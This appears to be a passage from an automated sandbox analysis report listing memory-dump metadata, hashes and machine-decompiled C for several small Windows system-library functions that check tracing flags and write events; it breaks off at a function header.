                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d89698810505e759d4bda8f89adf4a4f5cc2381a1d3b7cc89fc1e7865b9853bc
                                                                                                                                • Instruction ID: 4cbd83b4bac8adfa604e0bdca2daee126a9437b957e872032b836592fcfd621d
                                                                                                                                • Opcode Fuzzy Hash: d89698810505e759d4bda8f89adf4a4f5cc2381a1d3b7cc89fc1e7865b9853bc
                                                                                                                                • Instruction Fuzzy Hash: 07012872A047459BD711EB29CD40B5B77D5AB85394F048529F89583290EE30F842DBD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EFB02A, Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EFB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04F07D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04F67016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                0x04efb037
                                                                                                                                0x04efb039
                                                                                                                                0x04efb03b
                                                                                                                                0x04efb040
                                                                                                                                0x04f4a60e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4a61d
                                                                                                                                0x04efb04b
                                                                                                                                0x04efb04e
                                                                                                                                0x04f4a627
                                                                                                                                0x04f4a634
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4a641
                                                                                                                                0x04f4a653
                                                                                                                                0x04f4a643
                                                                                                                                0x04f4a64c
                                                                                                                                0x04f4a64c
                                                                                                                                0x04f4a65b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4a66c
                                                                                                                                0x04efb057
                                                                                                                                0x04efb057
                                                                                                                                0x04efb057
                                                                                                                                0x04efb046
                                                                                                                                0x04efb046
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                • Instruction ID: 7e125fb7ab0be002844e6c9a69af9b24db9f3d5333bdecb2bf21c594bc10c3c7
                                                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                • Instruction Fuzzy Hash: BB017C72645980DFE322DB5CCD88F667BD8EB85754F0940A1FA19CBA91EA28FC41C620
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F9FEC0, Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 59%
                                                                                                                                			E04F9FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4fdd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04F2FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04F07D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                0x04f9fec0
                                                                                                                                0x04f9fec0
                                                                                                                                0x04f9fecf
                                                                                                                                0x04f9fed9
                                                                                                                                0x04f9fede
                                                                                                                                0x04f9fee0
                                                                                                                                0x04f9feeb
                                                                                                                                0x04f9fef3
                                                                                                                                0x04f9fef6
                                                                                                                                0x04f9fef9
                                                                                                                                0x04f9ff04
                                                                                                                                0x04f9ff16
                                                                                                                                0x04f9ff06
                                                                                                                                0x04f9ff0f
                                                                                                                                0x04f9ff0f
                                                                                                                                0x04f9ff21
                                                                                                                                0x04f9ff22
                                                                                                                                0x04f9ff24
                                                                                                                                0x04f9ff29
                                                                                                                                0x04f9ff3e

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ca8f701e3cbc4c7061b0539d0270a5e06ec6466609a85cdd75ab243f3095737d
                                                                                                                                • Instruction ID: 86e42396e1bd2f0794be75de6338c120313389661eaabe9466ed6fa8d33de6ce
                                                                                                                                • Opcode Fuzzy Hash: ca8f701e3cbc4c7061b0539d0270a5e06ec6466609a85cdd75ab243f3095737d
                                                                                                                                • Instruction Fuzzy Hash: 7B018871E01218AFDB14DF69D945FAEB7B8EF45704F004066B900DB280DA74AA01C795
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F9FE3F, Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 59%
                                                                                                                                			E04F9FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4fdd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04F2FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04F07D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                0x04f9fe3f
                                                                                                                                0x04f9fe3f
                                                                                                                                0x04f9fe4e
                                                                                                                                0x04f9fe58
                                                                                                                                0x04f9fe5d
                                                                                                                                0x04f9fe5f
                                                                                                                                0x04f9fe6a
                                                                                                                                0x04f9fe72
                                                                                                                                0x04f9fe75
                                                                                                                                0x04f9fe78
                                                                                                                                0x04f9fe83
                                                                                                                                0x04f9fe95
                                                                                                                                0x04f9fe85
                                                                                                                                0x04f9fe8e
                                                                                                                                0x04f9fe8e
                                                                                                                                0x04f9fea0
                                                                                                                                0x04f9fea1
                                                                                                                                0x04f9fea3
                                                                                                                                0x04f9fea8
                                                                                                                                0x04f9febd

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 795731e8e487fdaf6af207bf937f530bbd555e2f8ca81b71fe066d3128fac6e4
                                                                                                                                • Instruction ID: fe476b52b21a5ad9d530eb89128f749088c87047b485cb943be10b545118505d
                                                                                                                                • Opcode Fuzzy Hash: 795731e8e487fdaf6af207bf937f530bbd555e2f8ca81b71fe066d3128fac6e4
                                                                                                                                • Instruction Fuzzy Hash: E5018871E01218ABDB14EF69D845FAEB7B8EF44714F004066B900DB281D974A941C7A5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8ED6, Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 54%
                                                                                                                                			E04FB8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4fdd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04F07D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                                0x04fb8ed6
                                                                                                                                0x04fb8ee5
                                                                                                                                0x04fb8eed
                                                                                                                                0x04fb8ef0
                                                                                                                                0x04fb8efa
                                                                                                                                0x04fb8f03
                                                                                                                                0x04fb8f0c
                                                                                                                                0x04fb8f15
                                                                                                                                0x04fb8f24
                                                                                                                                0x04fb8f27
                                                                                                                                0x04fb8f31
                                                                                                                                0x04fb8f43
                                                                                                                                0x04fb8f33
                                                                                                                                0x04fb8f3c
                                                                                                                                0x04fb8f3c
                                                                                                                                0x04fb8f4e
                                                                                                                                0x04fb8f4f
                                                                                                                                0x04fb8f51
                                                                                                                                0x04fb8f56
                                                                                                                                0x04fb8f69

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d14fffa1083bbfd4449ff73b09eea1077b12f1be142a408843c65948c9834cd2
                                                                                                                                • Instruction ID: 1491ac7fbf204b188e4cb4575690f4b5e9964043b4e5dea098532816f71f0ffd
                                                                                                                                • Opcode Fuzzy Hash: d14fffa1083bbfd4449ff73b09eea1077b12f1be142a408843c65948c9834cd2
                                                                                                                                • Instruction Fuzzy Hash: 43111270E012199FDB04DFA9D541BADB7F4FF08300F0442A6E918EB381E634A941CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8A62, Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 54%
                                                                                                                                			E04FB8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4fdd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04F07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04F2B640(E04F29AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                0x04fb8a62
                                                                                                                                0x04fb8a71
                                                                                                                                0x04fb8a79
                                                                                                                                0x04fb8a82
                                                                                                                                0x04fb8a85
                                                                                                                                0x04fb8a89
                                                                                                                                0x04fb8a8c
                                                                                                                                0x04fb8a8f
                                                                                                                                0x04fb8a92
                                                                                                                                0x04fb8a95
                                                                                                                                0x04fb8a9f
                                                                                                                                0x04fb8ab1
                                                                                                                                0x04fb8aa1
                                                                                                                                0x04fb8aaa
                                                                                                                                0x04fb8aaa
                                                                                                                                0x04fb8abc
                                                                                                                                0x04fb8abd
                                                                                                                                0x04fb8abf
                                                                                                                                0x04fb8ac4
                                                                                                                                0x04fb8ada

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0bc99068efd23fb6d50a16826201f7b5d5b6f3d85e2938a1b0e5f145001c5176
                                                                                                                                • Instruction ID: f33a6e02457d143d68582fa80c6efc33d31102d374bc947002721dea453ea854
                                                                                                                                • Opcode Fuzzy Hash: 0bc99068efd23fb6d50a16826201f7b5d5b6f3d85e2938a1b0e5f145001c5176
                                                                                                                                • Instruction Fuzzy Hash: 52012CB5A0121CAFDB00EFA9D9419EEBBB8EF49750F10405AF904E7341E634AA01CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEDB60, Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EEDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04EEDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04EEE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04EEE8B0(__ecx, _t14, 0xfff);
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                                0x04eedb64
                                                                                                                                0x04eedb66
                                                                                                                                0x04eedb6b
                                                                                                                                0x04eedbaa
                                                                                                                                0x04eedb71
                                                                                                                                0x04eedb76
                                                                                                                                0x04eedb7a
                                                                                                                                0x04eedba3
                                                                                                                                0x04eedb7c
                                                                                                                                0x04eedb87
                                                                                                                                0x04eedb8b
                                                                                                                                0x04f44fa1
                                                                                                                                0x04f44fb3
                                                                                                                                0x04f44fb8
                                                                                                                                0x04eedb91
                                                                                                                                0x04eedb96
                                                                                                                                0x04eedb98
                                                                                                                                0x04eedb98
                                                                                                                                0x04eedb8b
                                                                                                                                0x04eedb7a
                                                                                                                                0x04eedb9d
                                                                                                                                0x04eedba2

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                • Instruction ID: 130cea87296dcb867858558fae51de680607391b2b80e30161eb3287eb520c55
                                                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                • Instruction Fuzzy Hash: E3F0F6333016239FE3726B5B8C84FBBB6958FC1A64F161035F1059B348EE60BC0296E0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEB1E1, Relevance: .0, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EEB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04F07D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04F07D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04F67016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                0x04eeb1e8
                                                                                                                                0x04eeb1ea
                                                                                                                                0x04eeb1f3
                                                                                                                                0x04f44a17
                                                                                                                                0x04eeb1f9
                                                                                                                                0x04eeb1f9
                                                                                                                                0x04eeb1f9
                                                                                                                                0x04eeb201
                                                                                                                                0x04f44a21
                                                                                                                                0x04f44a2e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f44a3b
                                                                                                                                0x04f44a4d
                                                                                                                                0x04f44a3d
                                                                                                                                0x04f44a46
                                                                                                                                0x04f44a46
                                                                                                                                0x04f44a55
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04eeb20a
                                                                                                                                0x04eeb20a
                                                                                                                                0x04eeb20a
                                                                                                                                0x04eeb20a

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                • Instruction ID: 726e09a75b9c450a3fc901ade18cf7749292bd02f1b2923bb7909a798e0bf4e3
                                                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                • Instruction Fuzzy Hash: 0801D632600580AFE7229B5AC804F697BD8EF81758F0840A1FA149B6F2EA79F801D215
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F7FE87, Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 46%
                                                                                                                                			E04F7FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4fdd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04F07D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                                0x04f7fe96
                                                                                                                                0x04f7fe9e
                                                                                                                                0x04f7fea1
                                                                                                                                0x04f7fead
                                                                                                                                0x04f7feb3
                                                                                                                                0x04f7feb9
                                                                                                                                0x04f7fec3
                                                                                                                                0x04f7fed5
                                                                                                                                0x04f7fec5
                                                                                                                                0x04f7fece
                                                                                                                                0x04f7fece
                                                                                                                                0x04f7fee0
                                                                                                                                0x04f7fee1
                                                                                                                                0x04f7fee3
                                                                                                                                0x04f7fee8
                                                                                                                                0x04f7fefb

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 966e65a6508bf6d6f772c6756895467670bcf818c48d856832f00d5803310376
                                                                                                                                • Instruction ID: 1356c0e4fff02267f0def98e5295c042754a9ea679e6705c1d96dc8ae626d05e
                                                                                                                                • Opcode Fuzzy Hash: 966e65a6508bf6d6f772c6756895467670bcf818c48d856832f00d5803310376
                                                                                                                                • Instruction Fuzzy Hash: 57011271A0121CAFDB14DFA8D946A6EB7F4EF04304F1441AAE955DB382D639EA02CB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8F6A, Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 48%
                                                                                                                                			E04FB8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4fdd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04F07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                0x04fb8f6a
                                                                                                                                0x04fb8f79
                                                                                                                                0x04fb8f81
                                                                                                                                0x04fb8f84
                                                                                                                                0x04fb8f8b
                                                                                                                                0x04fb8f91
                                                                                                                                0x04fb8f94
                                                                                                                                0x04fb8f9e
                                                                                                                                0x04fb8fb0
                                                                                                                                0x04fb8fa0
                                                                                                                                0x04fb8fa9
                                                                                                                                0x04fb8fa9
                                                                                                                                0x04fb8fbb
                                                                                                                                0x04fb8fbc
                                                                                                                                0x04fb8fbe
                                                                                                                                0x04fb8fc3
                                                                                                                                0x04fb8fd6

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46753c8908dbd812a800cb2c54fecf8fad0e5d329ca6258f631e5dd136393426
                                                                                                                                • Instruction ID: 001f4af9136a7d359b2b7c7e89f4f2a053784726594d60384645eb6e90eca63a
                                                                                                                                • Opcode Fuzzy Hash: 46753c8908dbd812a800cb2c54fecf8fad0e5d329ca6258f631e5dd136393426
                                                                                                                                • Instruction Fuzzy Hash: 20014474E0120CAFDB00EFB9D945AAEB7F4EF48300F104059B945EB380EA74EA01DB94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FA131B, Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 48%
                                                                                                                                			E04FA131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4fdd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04F07D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                0x04fa131b
                                                                                                                                0x04fa132a
                                                                                                                                0x04fa1330
                                                                                                                                0x04fa1336
                                                                                                                                0x04fa133e
                                                                                                                                0x04fa1341
                                                                                                                                0x04fa1344
                                                                                                                                0x04fa134f
                                                                                                                                0x04fa1361
                                                                                                                                0x04fa1351
                                                                                                                                0x04fa135a
                                                                                                                                0x04fa135a
                                                                                                                                0x04fa136c
                                                                                                                                0x04fa136d
                                                                                                                                0x04fa136f
                                                                                                                                0x04fa1374
                                                                                                                                0x04fa1387

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3dab6f7875dd2e0b21bc156844f70957b7d2dd8968cb1f1f95450fe27b2e27d2
                                                                                                                                • Instruction ID: 1feeafee2a88a07aa7d0c0128b9d016a7401ed8f3a9ee5875d60106c87b240f9
                                                                                                                                • Opcode Fuzzy Hash: 3dab6f7875dd2e0b21bc156844f70957b7d2dd8968cb1f1f95450fe27b2e27d2
                                                                                                                                • Instruction Fuzzy Hash: 300131B1E0121CAFDB04EFA9DA45AAEB7F4FF48700F004059BD55EB381E674AA11CB54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0C577, Relevance: .0, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
